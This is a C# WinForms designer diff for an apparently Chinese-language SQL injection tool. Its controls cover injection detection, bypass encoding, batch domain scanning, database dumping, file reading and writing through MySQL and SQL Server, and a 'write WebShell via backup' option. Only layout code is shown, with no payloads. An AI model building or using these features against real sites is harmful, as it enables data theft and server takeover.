System.Windows.Forms.Button(); + this.scanInjection_importDomains = new System.Windows.Forms.Button(); + this.scanInjection_scanedURLSCount = new System.Windows.Forms.Label(); + this.scanInjection_txt_domainsPath = new System.Windows.Forms.TextBox(); + this.scanInjection_findURLSCount = new System.Windows.Forms.Label(); + this.label20 = new System.Windows.Forms.Label(); + this.label30 = new System.Windows.Forms.Label(); + this.label22 = new System.Windows.Forms.Label(); + this.label26 = new System.Windows.Forms.Label(); + this.scanInjection_domainsCount = new System.Windows.Forms.Label(); + this.scanInjection_scanedDomainCount = new 
System.Windows.Forms.Label(); + this.label25 = new System.Windows.Forms.Label(); + this.statusStrip1 = new System.Windows.Forms.StatusStrip(); + this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); + this.status_lbl_time = new System.Windows.Forms.ToolStripStatusLabel(); + this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel(); + this.status_lbl_threadStatus = new System.Windows.Forms.ToolStripStatusLabel(); + this.toolStripStatusLabel3 = new System.Windows.Forms.ToolStripStatusLabel(); + this.toolStripStatusLabel4 = new System.Windows.Forms.ToolStripStatusLabel(); + this.status_lbl_dbsCount = new System.Windows.Forms.ToolStripStatusLabel(); + this.toolStripStatusLabel5 = new System.Windows.Forms.ToolStripStatusLabel(); + this.status_lbl_tableCount = new System.Windows.Forms.ToolStripStatusLabel(); + this.toolStripStatusLabel6 = new System.Windows.Forms.ToolStripStatusLabel(); + this.status_lbl_dataCount = new System.Windows.Forms.ToolStripStatusLabel(); + this.toolStripStatusLabel7 = new System.Windows.Forms.ToolStripStatusLabel(); + this.status_lbl_runStatus = new System.Windows.Forms.ToolStripStatusLabel(); + this.toolStripStatusLabel8 = new System.Windows.Forms.ToolStripStatusLabel(); + this.status_lbl_all_status = new System.Windows.Forms.ToolStripStatusLabel(); + this.toolStripStatusLabel11 = new System.Windows.Forms.ToolStripStatusLabel(); + this.lbl_packsCount = new System.Windows.Forms.ToolStripStatusLabel(); + this.timer_status = new System.Windows.Forms.Timer(this.components); + this.timer_scanInjection = new System.Windows.Forms.Timer(this.components); + this.cbox_bypass_urlencode_count = new System.Windows.Forms.ComboBox(); + this.gb_basic.SuspendLayout(); + this.menuStrip_main.SuspendLayout(); + this.gb_logo.SuspendLayout(); + this.tab_logCenter.SuspendLayout(); + ((System.ComponentModel.ISupportInitialize)(this.splitContainer1)).BeginInit(); + this.splitContainer1.Panel1.SuspendLayout(); + 
this.splitContainer1.Panel2.SuspendLayout(); + this.splitContainer1.SuspendLayout(); + this.groupBox5.SuspendLayout(); + this.log_cms_dataifo.SuspendLayout(); + this.groupBox6.SuspendLayout(); + this.tabControl2.SuspendLayout(); + this.tabPage3.SuspendLayout(); + this.tabPage4.SuspendLayout(); + this.tabPage1.SuspendLayout(); + this.tab_file.SuspendLayout(); + this.groupBox7.SuspendLayout(); + this.tab_dataCenter.SuspendLayout(); + this.tabC_dataCenter.SuspendLayout(); + this.tab_vers.SuspendLayout(); + this.data_cms_vers.SuspendLayout(); + this.tab_dbs.SuspendLayout(); + ((System.ComponentModel.ISupportInitialize)(this.spc_dbs)).BeginInit(); + this.spc_dbs.Panel1.SuspendLayout(); + this.spc_dbs.Panel2.SuspendLayout(); + this.spc_dbs.SuspendLayout(); + this.data_dbs_ts.SuspendLayout(); + this.groupBox2.SuspendLayout(); + this.data_cms_dbs.SuspendLayout(); + this.toolStrip1.SuspendLayout(); + this.groupBox4.SuspendLayout(); + this.cms_data_dbs_lvw_data.SuspendLayout(); + this.tab_injectCenter.SuspendLayout(); + this.groupBox1.SuspendLayout(); + this.cms_dataPacks.SuspendLayout(); + this.groupBox3.SuspendLayout(); + this.groupBox16.SuspendLayout(); + this.groupBox15.SuspendLayout(); + this.mytab.SuspendLayout(); + this.tab_cmd.SuspendLayout(); + this.groupBox8.SuspendLayout(); + this.tab_bypass.SuspendLayout(); + this.groupBox9.SuspendLayout(); + this.bypass_lvw_replaceString_cms.SuspendLayout(); + this.tab_encoding.SuspendLayout(); + this.groupBox13.SuspendLayout(); + this.groupBox11.SuspendLayout(); + this.groupBox10.SuspendLayout(); + this.tab_scanInjection.SuspendLayout(); + this.groupBox14.SuspendLayout(); + ((System.ComponentModel.ISupportInitialize)(this.splitContainer2)).BeginInit(); + this.splitContainer2.Panel1.SuspendLayout(); + this.splitContainer2.Panel2.SuspendLayout(); + this.splitContainer2.SuspendLayout(); + this.scanInjectionURL_cms.SuspendLayout(); + this.scanInjection_cms.SuspendLayout(); + this.groupBox12.SuspendLayout(); + 
this.statusStrip1.SuspendLayout(); + this.SuspendLayout(); + // + // gb_basic + // + this.gb_basic.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.gb_basic.Controls.Add(this.chk_useSSL); + this.gb_basic.Controls.Add(this.btn_exportConfig); + this.gb_basic.Controls.Add(this.cbox_basic_threadSize); + this.gb_basic.Controls.Add(this.cbox_basic_reTryCount); + this.gb_basic.Controls.Add(this.cbox_basic_encoding); + this.gb_basic.Controls.Add(this.cbox_basic_timeOut); + this.gb_basic.Controls.Add(this.label9); + this.gb_basic.Controls.Add(this.label11); + this.gb_basic.Controls.Add(this.label5); + this.gb_basic.Controls.Add(this.btn_autoInject); + this.gb_basic.Controls.Add(this.cbox_basic_dbType); + this.gb_basic.Controls.Add(this.label6); + this.gb_basic.Controls.Add(this.cbox_basic_injectType); + this.gb_basic.Controls.Add(this.txt_basic_port); + this.gb_basic.Controls.Add(this.label2); + this.gb_basic.Controls.Add(this.txt_basic_host); + this.gb_basic.Controls.Add(this.label3); + this.gb_basic.Controls.Add(this.label7); + this.gb_basic.Controls.Add(this.label1); + this.gb_basic.Location = new System.Drawing.Point(11, 30); + this.gb_basic.Name = "gb_basic"; + this.gb_basic.Size = new System.Drawing.Size(810, 76); + this.gb_basic.TabIndex = 0; + this.gb_basic.TabStop = false; + this.gb_basic.Text = "基础信息"; + // + // chk_useSSL + // + this.chk_useSSL.AutoSize = true; + this.chk_useSSL.Location = new System.Drawing.Point(188, 49); + this.chk_useSSL.Name = "chk_useSSL"; + this.chk_useSSL.Size = new System.Drawing.Size(42, 16); + this.chk_useSSL.TabIndex = 12; + this.chk_useSSL.Text = "SSL"; + this.chk_useSSL.UseVisualStyleBackColor = true; + this.chk_useSSL.CheckedChanged += new System.EventHandler(this.chk_useSSL_CheckedChanged); + // + // btn_exportConfig + // + this.btn_exportConfig.Location = new System.Drawing.Point(708, 48); + 
this.btn_exportConfig.Name = "btn_exportConfig"; + this.btn_exportConfig.Size = new System.Drawing.Size(75, 23); + this.btn_exportConfig.TabIndex = 11; + this.btn_exportConfig.Text = "导出配置"; + this.btn_exportConfig.UseVisualStyleBackColor = true; + this.btn_exportConfig.Click += new System.EventHandler(this.btn_exportConfig_Click); + // + // cbox_basic_threadSize + // + this.cbox_basic_threadSize.FormattingEnabled = true; + this.cbox_basic_threadSize.Items.AddRange(new object[] { + "1", + "2", + "3", + "4", + "5", + "6", + "7", + "8", + "9", + "10", + "15", + "20", + "30", + "40", + "50", + "70", + "100"}); + this.cbox_basic_threadSize.Location = new System.Drawing.Point(641, 17); + this.cbox_basic_threadSize.Name = "cbox_basic_threadSize"; + this.cbox_basic_threadSize.Size = new System.Drawing.Size(50, 20); + this.cbox_basic_threadSize.TabIndex = 10; + this.cbox_basic_threadSize.TextChanged += new System.EventHandler(this.cbox_basic_threadSize_TextChanged); + // + // cbox_basic_reTryCount + // + this.cbox_basic_reTryCount.FormattingEnabled = true; + this.cbox_basic_reTryCount.Items.AddRange(new object[] { + "0", + "1", + "2", + "3"}); + this.cbox_basic_reTryCount.Location = new System.Drawing.Point(641, 47); + this.cbox_basic_reTryCount.Name = "cbox_basic_reTryCount"; + this.cbox_basic_reTryCount.Size = new System.Drawing.Size(50, 20); + this.cbox_basic_reTryCount.TabIndex = 9; + this.cbox_basic_reTryCount.TextChanged += new System.EventHandler(this.cbox_basic_reTryCount_TextChanged); + // + // cbox_basic_encoding + // + this.cbox_basic_encoding.FormattingEnabled = true; + this.cbox_basic_encoding.Items.AddRange(new object[] { + "自动识别", + "UTF-8", + "GB2312", + "GBK", + "ISO-8859-1"}); + this.cbox_basic_encoding.Location = new System.Drawing.Point(334, 49); + this.cbox_basic_encoding.Name = "cbox_basic_encoding"; + this.cbox_basic_encoding.Size = new System.Drawing.Size(78, 20); + this.cbox_basic_encoding.TabIndex = 8; + this.cbox_basic_encoding.TextChanged += new 
System.EventHandler(this.cbox_basic_encoding_TextChanged); + // + // cbox_basic_timeOut + // + this.cbox_basic_timeOut.FormattingEnabled = true; + this.cbox_basic_timeOut.Items.AddRange(new object[] { + "5", + "10", + "15", + "20", + "25", + "30", + "40", + "50", + "60"}); + this.cbox_basic_timeOut.Location = new System.Drawing.Point(334, 18); + this.cbox_basic_timeOut.Name = "cbox_basic_timeOut"; + this.cbox_basic_timeOut.Size = new System.Drawing.Size(78, 20); + this.cbox_basic_timeOut.TabIndex = 7; + this.cbox_basic_timeOut.TextChanged += new System.EventHandler(this.cbox_basic_timeOut_TextChanged); + // + // label9 + // + this.label9.AutoSize = true; + this.label9.Location = new System.Drawing.Point(263, 52); + this.label9.Name = "label9"; + this.label9.Size = new System.Drawing.Size(65, 12); + this.label9.TabIndex = 2; + this.label9.Text = "网页编码:"; + // + // label11 + // + this.label11.AutoSize = true; + this.label11.Location = new System.Drawing.Point(592, 51); + this.label11.Name = "label11"; + this.label11.Size = new System.Drawing.Size(47, 12); + this.label11.TabIndex = 2; + this.label11.Text = "重 试:"; + // + // label5 + // + this.label5.AutoSize = true; + this.label5.Location = new System.Drawing.Point(592, 21); + this.label5.Name = "label5"; + this.label5.Size = new System.Drawing.Size(47, 12); + this.label5.TabIndex = 2; + this.label5.Text = "线 程:"; + // + // btn_autoInject + // + this.btn_autoInject.ImageKey = "(无)"; + this.btn_autoInject.Location = new System.Drawing.Point(708, 16); + this.btn_autoInject.Name = "btn_autoInject"; + this.btn_autoInject.Size = new System.Drawing.Size(75, 23); + this.btn_autoInject.TabIndex = 5; + this.btn_autoInject.Text = "识别注入"; + this.btn_autoInject.UseVisualStyleBackColor = true; + this.btn_autoInject.Click += new System.EventHandler(this.btn_autoInject_Click); + // + // cbox_basic_dbType + // + this.cbox_basic_dbType.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + 
this.cbox_basic_dbType.FormattingEnabled = true; + this.cbox_basic_dbType.Items.AddRange(new object[] { + "未 知", + "Access", + "MySQL5", + "SQLServer", + "Oracle"}); + this.cbox_basic_dbType.Location = new System.Drawing.Point(495, 47); + this.cbox_basic_dbType.Name = "cbox_basic_dbType"; + this.cbox_basic_dbType.Size = new System.Drawing.Size(80, 20); + this.cbox_basic_dbType.TabIndex = 3; + this.cbox_basic_dbType.SelectedIndexChanged += new System.EventHandler(this.cbox_basic_dbType_SelectedIndexChanged); + // + // label6 + // + this.label6.AutoSize = true; + this.label6.Location = new System.Drawing.Point(427, 50); + this.label6.Name = "label6"; + this.label6.Size = new System.Drawing.Size(65, 12); + this.label6.TabIndex = 4; + this.label6.Text = "数 据 库:"; + // + // cbox_basic_injectType + // + this.cbox_basic_injectType.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + this.cbox_basic_injectType.FormattingEnabled = true; + this.cbox_basic_injectType.Items.AddRange(new object[] { + "未 知", + "盲 注", + "显错注入", + "Union注入"}); + this.cbox_basic_injectType.Location = new System.Drawing.Point(495, 17); + this.cbox_basic_injectType.Name = "cbox_basic_injectType"; + this.cbox_basic_injectType.Size = new System.Drawing.Size(81, 20); + this.cbox_basic_injectType.TabIndex = 5; + this.cbox_basic_injectType.SelectedIndexChanged += new System.EventHandler(this.cbox_basic_injectType_SelectedIndexChanged); + // + // txt_basic_port + // + this.txt_basic_port.Location = new System.Drawing.Point(88, 46); + this.txt_basic_port.Name = "txt_basic_port"; + this.txt_basic_port.Size = new System.Drawing.Size(80, 21); + this.txt_basic_port.TabIndex = 4; + this.txt_basic_port.Text = "80"; + this.txt_basic_port.TextChanged += new System.EventHandler(this.txt_basic_port_TextChanged); + // + // label2 + // + this.label2.AutoSize = true; + this.label2.Location = new System.Drawing.Point(19, 51); + this.label2.Name = "label2"; + this.label2.Size = new System.Drawing.Size(65, 
12); + this.label2.TabIndex = 3; + this.label2.Text = "目标端口:"; + // + // txt_basic_host + // + this.txt_basic_host.Location = new System.Drawing.Point(88, 17); + this.txt_basic_host.Name = "txt_basic_host"; + this.txt_basic_host.Size = new System.Drawing.Size(160, 21); + this.txt_basic_host.TabIndex = 2; + this.txt_basic_host.Text = "127.0.0.1"; + this.txt_basic_host.TextChanged += new System.EventHandler(this.txt_basic_host_TextChanged); + // + // label3 + // + this.label3.AutoSize = true; + this.label3.Location = new System.Drawing.Point(263, 21); + this.label3.Name = "label3"; + this.label3.Size = new System.Drawing.Size(65, 12); + this.label3.TabIndex = 2; + this.label3.Text = "超时时间:"; + // + // label7 + // + this.label7.AutoSize = true; + this.label7.Location = new System.Drawing.Point(427, 20); + this.label7.Name = "label7"; + this.label7.Size = new System.Drawing.Size(65, 12); + this.label7.TabIndex = 1; + this.label7.Text = "注入类型:"; + // + // label1 + // + this.label1.AutoSize = true; + this.label1.Location = new System.Drawing.Point(19, 21); + this.label1.Name = "label1"; + this.label1.Size = new System.Drawing.Size(65, 12); + this.label1.TabIndex = 1; + this.label1.Text = "域名或IP:"; + // + // menuStrip_main + // + this.menuStrip_main.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.tsmi_menu, + this.tsmi_tools, + this.toolStripMenuItem1, + this.tsmi_help}); + this.menuStrip_main.Location = new System.Drawing.Point(0, 0); + this.menuStrip_main.Name = "menuStrip_main"; + this.menuStrip_main.Size = new System.Drawing.Size(834, 25); + this.menuStrip_main.TabIndex = 2; + this.menuStrip_main.Text = "menuStrip1"; + // + // tsmi_menu + // + this.tsmi_menu.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.tsmi_openConfig, + this.tsmi_saveConfig}); + this.tsmi_menu.Name = "tsmi_menu"; + this.tsmi_menu.Size = new System.Drawing.Size(48, 21); + this.tsmi_menu.Text = "菜 单"; + // + // tsmi_openConfig + // + 
this.tsmi_openConfig.Name = "tsmi_openConfig"; + this.tsmi_openConfig.Size = new System.Drawing.Size(124, 22); + this.tsmi_openConfig.Text = "导入配置"; + this.tsmi_openConfig.Click += new System.EventHandler(this.tsmi_openConfig_Click); + // + // tsmi_saveConfig + // + this.tsmi_saveConfig.Name = "tsmi_saveConfig"; + this.tsmi_saveConfig.Size = new System.Drawing.Size(124, 22); + this.tsmi_saveConfig.Text = "保存配置"; + this.tsmi_saveConfig.Click += new System.EventHandler(this.tsmi_saveConfig_Click); + // + // tsmi_tools + // + this.tsmi_tools.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.脱裤助手ToolStripMenuItem}); + this.tsmi_tools.Name = "tsmi_tools"; + this.tsmi_tools.Size = new System.Drawing.Size(48, 21); + this.tsmi_tools.Text = "工 具"; + // + // 脱裤助手ToolStripMenuItem + // + this.脱裤助手ToolStripMenuItem.Name = "脱裤助手ToolStripMenuItem"; + this.脱裤助手ToolStripMenuItem.Size = new System.Drawing.Size(124, 22); + this.脱裤助手ToolStripMenuItem.Text = "脱裤助手"; + // + // toolStripMenuItem1 + // + this.toolStripMenuItem1.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.tsmi_seting}); + this.toolStripMenuItem1.Name = "toolStripMenuItem1"; + this.toolStripMenuItem1.Size = new System.Drawing.Size(68, 21); + this.toolStripMenuItem1.Text = "系统设置"; + // + // tsmi_seting + // + this.tsmi_seting.Name = "tsmi_seting"; + this.tsmi_seting.Size = new System.Drawing.Size(124, 22); + this.tsmi_seting.Text = "系统设置"; + this.tsmi_seting.Click += new System.EventHandler(this.tsmi_seting_Click); + // + // tsmi_help + // + this.tsmi_help.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.tsmi_readme, + this.tsmi_about, + this.tsmi_update, + this.tsmi_mustRead, + this.版本ToolStripMenuItem, + this.tsmi_bugReport}); + this.tsmi_help.Name = "tsmi_help"; + this.tsmi_help.Size = new System.Drawing.Size(48, 21); + this.tsmi_help.Text = "帮 助"; + // + // tsmi_readme + // + this.tsmi_readme.Name = "tsmi_readme"; + this.tsmi_readme.Size = new 
System.Drawing.Size(124, 22); + this.tsmi_readme.Text = "使用手册"; + this.tsmi_readme.Click += new System.EventHandler(this.tsmi_readme_Click); + // + // tsmi_about + // + this.tsmi_about.Name = "tsmi_about"; + this.tsmi_about.Size = new System.Drawing.Size(124, 22); + this.tsmi_about.Text = "关 于"; + this.tsmi_about.Click += new System.EventHandler(this.tsmi_about_Click); + // + // tsmi_update + // + this.tsmi_update.Name = "tsmi_update"; + this.tsmi_update.Size = new System.Drawing.Size(124, 22); + this.tsmi_update.Text = "在线更新"; + this.tsmi_update.Click += new System.EventHandler(this.tsmi_update_Click); + // + // tsmi_mustRead + // + this.tsmi_mustRead.Name = "tsmi_mustRead"; + this.tsmi_mustRead.Size = new System.Drawing.Size(124, 22); + this.tsmi_mustRead.Text = "声 明"; + this.tsmi_mustRead.Click += new System.EventHandler(this.tsmi_mustRead_Click); + // + // 版本ToolStripMenuItem + // + this.版本ToolStripMenuItem.Name = "版本ToolStripMenuItem"; + this.版本ToolStripMenuItem.Size = new System.Drawing.Size(124, 22); + this.版本ToolStripMenuItem.Text = "版本"; + this.版本ToolStripMenuItem.Click += new System.EventHandler(this.版本ToolStripMenuItem_Click); + // + // tsmi_bugReport + // + this.tsmi_bugReport.Name = "tsmi_bugReport"; + this.tsmi_bugReport.Size = new System.Drawing.Size(124, 22); + this.tsmi_bugReport.Text = "Bug反馈"; + this.tsmi_bugReport.Click += new System.EventHandler(this.tsmi_bugReport_Click); + // + // gb_logo + // + this.gb_logo.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.gb_logo.Controls.Add(this.txt_log); + this.gb_logo.Location = new System.Drawing.Point(8, 569); + this.gb_logo.Name = "gb_logo"; + this.gb_logo.Size = new System.Drawing.Size(813, 87); + this.gb_logo.TabIndex = 3; + this.gb_logo.TabStop = false; + this.gb_logo.Text = "日志"; + // + // txt_log + // + this.txt_log.Dock = System.Windows.Forms.DockStyle.Fill; + 
this.txt_log.Location = new System.Drawing.Point(3, 17); + this.txt_log.Multiline = true; + this.txt_log.Name = "txt_log"; + this.txt_log.ScrollBars = System.Windows.Forms.ScrollBars.Both; + this.txt_log.Size = new System.Drawing.Size(807, 67); + this.txt_log.TabIndex = 3; + // + // tab_logCenter + // + this.tab_logCenter.Controls.Add(this.splitContainer1); + this.tab_logCenter.ImageKey = "log.png"; + this.tab_logCenter.Location = new System.Drawing.Point(4, 23); + this.tab_logCenter.Name = "tab_logCenter"; + this.tab_logCenter.Size = new System.Drawing.Size(802, 424); + this.tab_logCenter.TabIndex = 3; + this.tab_logCenter.Text = "日志中心"; + this.tab_logCenter.UseVisualStyleBackColor = true; + // + // splitContainer1 + // + this.splitContainer1.Dock = System.Windows.Forms.DockStyle.Fill; + this.splitContainer1.Location = new System.Drawing.Point(0, 0); + this.splitContainer1.Name = "splitContainer1"; + this.splitContainer1.Orientation = System.Windows.Forms.Orientation.Horizontal; + // + // splitContainer1.Panel1 + // + this.splitContainer1.Panel1.Controls.Add(this.groupBox5); + // + // splitContainer1.Panel2 + // + this.splitContainer1.Panel2.Controls.Add(this.groupBox6); + this.splitContainer1.Size = new System.Drawing.Size(802, 424); + this.splitContainer1.SplitterDistance = 214; + this.splitContainer1.TabIndex = 2; + // + // groupBox5 + // + this.groupBox5.Controls.Add(this.log_lvw_httpLog); + this.groupBox5.Dock = System.Windows.Forms.DockStyle.Fill; + this.groupBox5.Location = new System.Drawing.Point(0, 0); + this.groupBox5.Name = "groupBox5"; + this.groupBox5.Size = new System.Drawing.Size(802, 214); + this.groupBox5.TabIndex = 0; + this.groupBox5.TabStop = false; + this.groupBox5.Text = "数据包历史记录"; + // + // log_lvw_httpLog + // + this.log_lvw_httpLog.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { + this.log_col_index, + this.log_col_payload, + this.col_runtime, + this.log_col_code, + this.log_col_bodyLength, + this.log_col_sleepTime}); + 
this.log_lvw_httpLog.ContextMenuStrip = this.log_cms_dataifo; + this.log_lvw_httpLog.Dock = System.Windows.Forms.DockStyle.Fill; + this.log_lvw_httpLog.FullRowSelect = true; + this.log_lvw_httpLog.Location = new System.Drawing.Point(3, 17); + this.log_lvw_httpLog.Name = "log_lvw_httpLog"; + this.log_lvw_httpLog.Size = new System.Drawing.Size(796, 194); + this.log_lvw_httpLog.TabIndex = 1; + this.log_lvw_httpLog.UseCompatibleStateImageBehavior = false; + this.log_lvw_httpLog.View = System.Windows.Forms.View.Details; + this.log_lvw_httpLog.ColumnClick += new System.Windows.Forms.ColumnClickEventHandler(this.log_lvw_httpLog_ColumnClick); + this.log_lvw_httpLog.SelectedIndexChanged += new System.EventHandler(this.log_lvw_httpLog_SelectedIndexChanged); + this.log_lvw_httpLog.MouseClick += new System.Windows.Forms.MouseEventHandler(this.log_lvw_httpLog_MouseClick); + // + // log_col_index + // + this.log_col_index.Text = "发包序号"; + this.log_col_index.Width = 75; + // + // log_col_payload + // + this.log_col_payload.Text = "Payload"; + this.log_col_payload.Width = 376; + // + // col_runtime + // + this.col_runtime.Text = "用时[毫秒]"; + this.col_runtime.Width = 85; + // + // log_col_code + // + this.log_col_code.Text = "状态码"; + this.log_col_code.Width = 65; + // + // log_col_bodyLength + // + this.log_col_bodyLength.Text = "body长度"; + this.log_col_bodyLength.Width = 85; + // + // log_col_sleepTime + // + this.log_col_sleepTime.Text = "延时[毫秒]"; + this.log_col_sleepTime.Width = 85; + // + // log_cms_dataifo + // + this.log_cms_dataifo.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.data_cms_clearLog}); + this.log_cms_dataifo.Name = "log_cms_dataifo"; + this.log_cms_dataifo.Size = new System.Drawing.Size(125, 26); + // + // data_cms_clearLog + // + this.data_cms_clearLog.Name = "data_cms_clearLog"; + this.data_cms_clearLog.Size = new System.Drawing.Size(124, 22); + this.data_cms_clearLog.Text = "清空记录"; + this.data_cms_clearLog.Click += new 
System.EventHandler(this.data_cms_clearLog_Click); + // + // groupBox6 + // + this.groupBox6.Controls.Add(this.tabControl2); + this.groupBox6.Dock = System.Windows.Forms.DockStyle.Fill; + this.groupBox6.Location = new System.Drawing.Point(0, 0); + this.groupBox6.Name = "groupBox6"; + this.groupBox6.Size = new System.Drawing.Size(802, 206); + this.groupBox6.TabIndex = 1; + this.groupBox6.TabStop = false; + this.groupBox6.Text = "数据包详情"; + // + // tabControl2 + // + this.tabControl2.Controls.Add(this.tabPage3); + this.tabControl2.Controls.Add(this.tabPage4); + this.tabControl2.Controls.Add(this.tabPage1); + this.tabControl2.Dock = System.Windows.Forms.DockStyle.Fill; + this.tabControl2.Location = new System.Drawing.Point(3, 17); + this.tabControl2.Name = "tabControl2"; + this.tabControl2.SelectedIndex = 0; + this.tabControl2.Size = new System.Drawing.Size(796, 186); + this.tabControl2.TabIndex = 0; + // + // tabPage3 + // + this.tabPage3.Controls.Add(this.log_txt_request); + this.tabPage3.Location = new System.Drawing.Point(4, 22); + this.tabPage3.Name = "tabPage3"; + this.tabPage3.Padding = new System.Windows.Forms.Padding(3); + this.tabPage3.Size = new System.Drawing.Size(788, 160); + this.tabPage3.TabIndex = 0; + this.tabPage3.Text = "请 求"; + this.tabPage3.UseVisualStyleBackColor = true; + // + // log_txt_request + // + this.log_txt_request.Dock = System.Windows.Forms.DockStyle.Fill; + this.log_txt_request.Location = new System.Drawing.Point(3, 3); + this.log_txt_request.Multiline = true; + this.log_txt_request.Name = "log_txt_request"; + this.log_txt_request.ScrollBars = System.Windows.Forms.ScrollBars.Both; + this.log_txt_request.Size = new System.Drawing.Size(782, 154); + this.log_txt_request.TabIndex = 0; + // + // tabPage4 + // + this.tabPage4.Controls.Add(this.log_txt_response); + this.tabPage4.Location = new System.Drawing.Point(4, 22); + this.tabPage4.Name = "tabPage4"; + this.tabPage4.Padding = new System.Windows.Forms.Padding(3); + this.tabPage4.Size = 
new System.Drawing.Size(788, 160); + this.tabPage4.TabIndex = 1; + this.tabPage4.Text = "响 应"; + this.tabPage4.UseVisualStyleBackColor = true; + // + // log_txt_response + // + this.log_txt_response.Dock = System.Windows.Forms.DockStyle.Fill; + this.log_txt_response.Location = new System.Drawing.Point(3, 3); + this.log_txt_response.Multiline = true; + this.log_txt_response.Name = "log_txt_response"; + this.log_txt_response.ScrollBars = System.Windows.Forms.ScrollBars.Both; + this.log_txt_response.Size = new System.Drawing.Size(782, 154); + this.log_txt_response.TabIndex = 1; + this.log_txt_response.KeyDown += new System.Windows.Forms.KeyEventHandler(this.log_txt_response_KeyDown); + // + // tabPage1 + // + this.tabPage1.Controls.Add(this.webBro_log); + this.tabPage1.Location = new System.Drawing.Point(4, 22); + this.tabPage1.Name = "tabPage1"; + this.tabPage1.Size = new System.Drawing.Size(788, 160); + this.tabPage1.TabIndex = 2; + this.tabPage1.Text = "在浏览器中显示"; + this.tabPage1.UseVisualStyleBackColor = true; + // + // webBro_log + // + this.webBro_log.Dock = System.Windows.Forms.DockStyle.Fill; + this.webBro_log.Location = new System.Drawing.Point(0, 0); + this.webBro_log.MinimumSize = new System.Drawing.Size(20, 20); + this.webBro_log.Name = "webBro_log"; + this.webBro_log.Size = new System.Drawing.Size(788, 160); + this.webBro_log.TabIndex = 1; + // + // tab_file + // + this.tab_file.Controls.Add(this.file_txt_result); + this.tab_file.Controls.Add(this.groupBox7); + this.tab_file.ImageKey = "editFile.png"; + this.tab_file.Location = new System.Drawing.Point(4, 23); + this.tab_file.Name = "tab_file"; + this.tab_file.Size = new System.Drawing.Size(802, 424); + this.tab_file.TabIndex = 4; + this.tab_file.Text = "文件操作"; + this.tab_file.UseVisualStyleBackColor = true; + // + // file_txt_result + // + this.file_txt_result.Dock = System.Windows.Forms.DockStyle.Fill; + this.file_txt_result.Location = new System.Drawing.Point(0, 76); + this.file_txt_result.MaxLength = 
3276700; + this.file_txt_result.Multiline = true; + this.file_txt_result.Name = "file_txt_result"; + this.file_txt_result.ScrollBars = System.Windows.Forms.ScrollBars.Vertical; + this.file_txt_result.Size = new System.Drawing.Size(802, 348); + this.file_txt_result.TabIndex = 0; + this.file_txt_result.TextChanged += new System.EventHandler(this.file_txt_result_TextChanged); + this.file_txt_result.KeyDown += new System.Windows.Forms.KeyEventHandler(this.file_txt_result_KeyDown); + // + // groupBox7 + // + this.groupBox7.Controls.Add(this.file_btn_start); + this.groupBox7.Controls.Add(this.file_cbox_readWrite); + this.groupBox7.Controls.Add(this.file_txt_filePath); + this.groupBox7.Controls.Add(this.label14); + this.groupBox7.Controls.Add(this.cbox_file_readFileEncoding); + this.groupBox7.Controls.Add(this.label24); + this.groupBox7.Dock = System.Windows.Forms.DockStyle.Top; + this.groupBox7.Location = new System.Drawing.Point(0, 0); + this.groupBox7.Name = "groupBox7"; + this.groupBox7.Size = new System.Drawing.Size(802, 76); + this.groupBox7.TabIndex = 0; + this.groupBox7.TabStop = false; + this.groupBox7.Text = "文件操作"; + // + // file_btn_start + // + this.file_btn_start.Location = new System.Drawing.Point(695, 31); + this.file_btn_start.Name = "file_btn_start"; + this.file_btn_start.Size = new System.Drawing.Size(75, 23); + this.file_btn_start.TabIndex = 12; + this.file_btn_start.Text = "开始"; + this.file_btn_start.UseVisualStyleBackColor = true; + this.file_btn_start.Click += new System.EventHandler(this.file_btn_start_Click); + // + // file_cbox_readWrite + // + this.file_cbox_readWrite.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + this.file_cbox_readWrite.FormattingEnabled = true; + this.file_cbox_readWrite.Items.AddRange(new object[] { + "MySQL Load_File读文件", + "MySQL Union写文件", + "SQLServer FileSystemObject写文件", + "SQLServer Sp_MakeWebTask写文件", + "SQLServer 备份写WebShell(有多余数据)", + "SQLServer FileSystemObject读文件", + "加载获取IIS虚拟网站信息VBS"}); + 
this.file_cbox_readWrite.Location = new System.Drawing.Point(409, 31); + this.file_cbox_readWrite.Name = "file_cbox_readWrite"; + this.file_cbox_readWrite.Size = new System.Drawing.Size(274, 20); + this.file_cbox_readWrite.TabIndex = 2; + this.file_cbox_readWrite.SelectedIndexChanged += new System.EventHandler(this.file_cbox_readWrite_SelectedIndexChanged); + // + // file_txt_filePath + // + this.file_txt_filePath.Location = new System.Drawing.Point(85, 30); + this.file_txt_filePath.Name = "file_txt_filePath"; + this.file_txt_filePath.Size = new System.Drawing.Size(158, 21); + this.file_txt_filePath.TabIndex = 1; + // + // label14 + // + this.label14.AutoSize = true; + this.label14.Location = new System.Drawing.Point(32, 33); + this.label14.Name = "label14"; + this.label14.Size = new System.Drawing.Size(47, 12); + this.label14.TabIndex = 0; + this.label14.Text = "路 径:"; + // + // cbox_file_readFileEncoding + // + this.cbox_file_readFileEncoding.FormattingEnabled = true; + this.cbox_file_readFileEncoding.Items.AddRange(new object[] { + "UTF-8", + "GB2312", + "GBK", + "ISO-8859-1"}); + this.cbox_file_readFileEncoding.Location = new System.Drawing.Point(325, 31); + this.cbox_file_readFileEncoding.Name = "cbox_file_readFileEncoding"; + this.cbox_file_readFileEncoding.Size = new System.Drawing.Size(78, 20); + this.cbox_file_readFileEncoding.TabIndex = 8; + 